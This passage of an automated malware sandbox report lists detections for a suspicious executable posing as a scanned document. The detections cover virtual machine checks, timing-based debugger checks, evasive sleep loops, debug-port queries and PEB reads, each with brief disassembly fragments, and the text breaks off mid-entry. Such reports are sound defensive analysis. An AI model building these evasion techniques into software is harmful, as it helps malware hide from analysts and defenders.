Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 0000000000F074AE second address: 0000000000F074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F95595 rdtsc 0_2_05F95595
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | API coverage: 2.3 %
Source: C:\Windows\SysWOW64\systray.exe | API coverage: 5.0 %
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | API coverage: 2.2 % (reported 2 times)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe TID: 3224 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe TID: 824 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 1340 | Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe TID: 2204 | Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe TID: 4868 | Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (reported 2 times)
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: vrhdctut50jxtp.exe, 0000000F.00000002.1117943880.00000000027A0000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: vrhdctut50jxtp.exe | Binary or memory string: 01lXXnOEvEHTYeOrs3hGfs4waIYQPAlFaQOCvi6ewWunD2FaSpwFefR1UvSFd0GKq7C6cTAXF8SH0XrfL8k6xDYxx4Q+GjACxSCw3OePvIU77FyXENgPYQqlZnxb1jTMpUD4FAwv3nKCe/3LSahplmkThDkmhhV0ZyDAMCatySM0Q0v6b3UDO7j4UzOaV517j+2bgoohPh9j8rkMayq3185WcNDENX6VQZQnzNpZQvPWuiXqROn/DlSYCVP8Yoay0yFK
Source: vrhdctut50jxtp.exe | Binary or memory string: xM0LqGj6LjCrw1w4Y9EDPz9F7Zgl2+0A51M/EsSGFCADue5SU1bWhFrvRMo2sv3k8xtOFUbFdSbnV3M6H5AyxTZ57z6XjTXx9/ke9WA1nggpAHVlbYSyYFbxdNBhe01HZkSPRAEOM+aI+BAUikac707YEwIG0/w8nHj+03KYP80NHgFsuPY6up0sx5W1AR0Ab7UE47UTX88St1OzzIJ7E0mTp6024W65nvogC8ngZH4UOZCWodDFq3mKqCkpp2CWLYrf
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.813996700.0000000007340000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processes
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe; Process queried: DebugPort
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe; Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F95595 rdtsc 0_2_05F95595
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F0A5F0 NtReadVirtualMemory,LdrInitializeThunk, 0_2_05F0A5F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F96DFD mov eax, dword ptr fs:[00000030h] 0_2_05F96DFD
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05ED6DE1 mov eax, dword ptr fs:[00000030h] 0_2_05ED6DE1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EC15E1 mov eax, dword ptr fs:[00000030h] 0_2_05EC15E1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F985EA mov eax, dword ptr fs:[00000030h] 0_2_05F985EA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F71DE3 mov ecx, dword ptr fs:[00000030h] 0_2_05F71DE3
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F71DE3 mov eax, dword ptr fs:[00000030h] 0_2_05F71DE3
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EF75F0 mov eax, dword ptr fs:[00000030h] 0_2_05EF75F0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EF2DF0 mov eax, dword ptr fs:[00000030h] 0_2_05EF2DF0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EC95C0 mov eax, dword ptr fs:[00000030h] 0_2_05EC95C0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EC95C0 mov ecx, dword ptr fs:[00000030h] 0_2_05EC95C0
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F44DCA mov eax, dword ptr fs:[00000030h] 0_2_05F44DCA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EC2DAA mov eax, dword ptr fs:[00000030h] 0_2_05EC2DAA
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F815A8 mov eax, dword ptr fs:[00000030h] 0_2_05F815A8
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EC35B1 mov eax, dword ptr fs:[00000030h] 0_2_05EC35B1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F09DAF mov eax, dword ptr fs:[00000030h] 0_2_05F09DAF
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EF0584 mov eax, dword ptr fs:[00000030h] 0_2_05EF0584
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F95595 mov eax, dword ptr fs:[00000030h] 0_2_05F95595
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F98589 mov eax, dword ptr fs:[00000030h] 0_2_05F98589
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F80D8A mov eax, dword ptr fs:[00000030h] 0_2_05F80D8A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EE1D9D mov eax, dword ptr fs:[00000030h] 0_2_05EE1D9D
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F8E581 mov eax, dword ptr fs:[00000030h] 0_2_05F8E581
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F6E58A mov ecx, dword ptr fs:[00000030h] 0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F6E58A mov eax, dword ptr fs:[00000030h] 0_2_05F6E58A
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EEF591 mov eax, dword ptr fs:[00000030h] 0_2_05EEF591
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EC356C mov eax, dword ptr fs:[00000030h] 0_2_05EC356C
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EF056B mov eax, dword ptr fs:[00000030h] 0_2_05EF056B
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EFE52F mov ecx, dword ptr fs:[00000030h] 0_2_05EFE52F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EFE52F mov eax, dword ptr fs:[00000030h] 0_2_05EFE52F
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05F9952E mov eax, dword ptr fs:[00000030h] 0_2_05F9952E
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EE1530 mov eax, dword ptr fs:[00000030h] 0_2_05EE1530
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe; Code function: 0_2_05EE1530 mo